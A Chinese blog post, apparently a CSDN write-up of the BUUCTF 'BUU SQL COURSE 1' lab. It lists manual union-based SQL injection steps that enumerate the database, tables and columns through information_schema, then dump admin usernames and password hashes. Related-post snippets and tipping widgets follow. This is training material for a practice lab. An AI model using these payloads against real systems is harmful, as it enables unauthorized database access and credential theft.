BUU SQL COURSE 11

已于 2022-10-03 19:07:36 修改
阅读量1.2k 收藏 2
点赞数 1
分类专栏: 网络安全CTF比赛 文章标签: 网络安全
于 2022-04-19 18:36:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58199719/article/details/124279958
版权

打开之后 F12查看

http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1

找到注入点

sql手工注入流程

1、判断注入类型 ?id=1 or 1=1  ?id=1' or '1'='1

2、判断列数:?id=1 order by 1,2,3

3、判断注入点:?id=-1 union select 1 ?id=-1 union select 1,2,3

4、查看数据库:?id=-1 union select 1,database()

5、查看表名:?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news'

6、查看列名:  ?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

7、查看字段:?id=-1 union select 1,group_concat(username) from admin

        ?id=-1 union select 1,group_concat(password) from admin

账号 admin 密码 62ca075a51d47c2b4d187c1088186532

小晨_WEB
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的热点-书签-社交网络通知-每个新标签的高品质壁纸-时钟显示日期和时间-天气小部件-打开搜索 支持语言:English,中文 (简体),中文 (繁體)
BUU SQL COURSE 1 1(SQL注入)
小谢的博客
10-25 2780
BUU SQL COURSE 1 1(SQL注入)题解
BUUCTF】BUU SQL COURSE 1 1
最新发布
qq_41369524的博客
12-10 1242
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审题,题目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3413
首先判断注入类型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库。
buu(sql注入)
qq_62046696的博客
08-23 1095
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUU SQL COURSE 1
qq_51902218的博客
08-25 2119
1. 观察页面,只有两块主要内容,热点和登录 2. 测试登录,发现貌似没用存在注入点 3. 高度怀疑热点 ,这时候,我们打开火狐浏览器,用f12,选择网络看一下有什么猫腻 状态码200:请求已成功,请求所希望的响应头或数据体将随此响应返回。即返回的数据为全量的数据,如果文件不通过GZIP压缩的话,文件是多大,则要有多大传输量。 状态码304:如果客户端发送了一个带条件的 GET 请求且该请求已被允许,而文档的内容(自上次访问以来或者根据请求的条件)并没有改变,则服务器应当返回这个状态码...
BUUCTF)BUU SQL COURSE 1
weixin_63442046的博客
04-28 1241
关于BUU SQL COURSE 1的思路
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
SQL50题(7、10、11、12、17、18)
铁血阿张
05-06 377
学生表: Student(s_id,s_name,s_birth,s_sex) – –学生编号,学生姓名, 出生年月,学生性别 课程表:Course(c_id,c_name,t_id) – –课程编号, 课程名称, 教师编号 教师表: Teacher(t_id,t_name) – –教师编号,教师姓名 成绩表: Score(s_id,c_id,s_s_score) – –学生编号,课程编号,分数...
BUUCTF Basic 持续更新
natecho的博客
12-27 3621
Linux Labs 题目:ssh 用户名:root 密码:123456 地址和端口为动态分配的。 靶机信息 解题: 按照题目建立ssh连接 登录后,可以看到根目录中有flag BUU LFI COURSE 1 题目: <?php/** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) {
BUU LFI COURSE 11(解题分享)
TinFrog的博客
07-17 265
BUU LFI COURSE 11(解题分享)
数据库考点_11
fanfan999的博客
07-28 266
GROUP BY 作用: 根据给定数据列的每个成员,对查询结果进行分组统计,关于这句话,有两个解释: 满足SELECT字句中的列名必须为分组列或者列函数. 也就是说: 要么是group by 中用到了列,要么就是带有max这类的列函数的列. 注意: 上面的条件只针对同一张表成立,如果用到了多张表,就算列名不满足条件也是正确的,具体看例子2 列函数对于group by子句定义的每个组各返回一个...
网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 5620
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8204
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值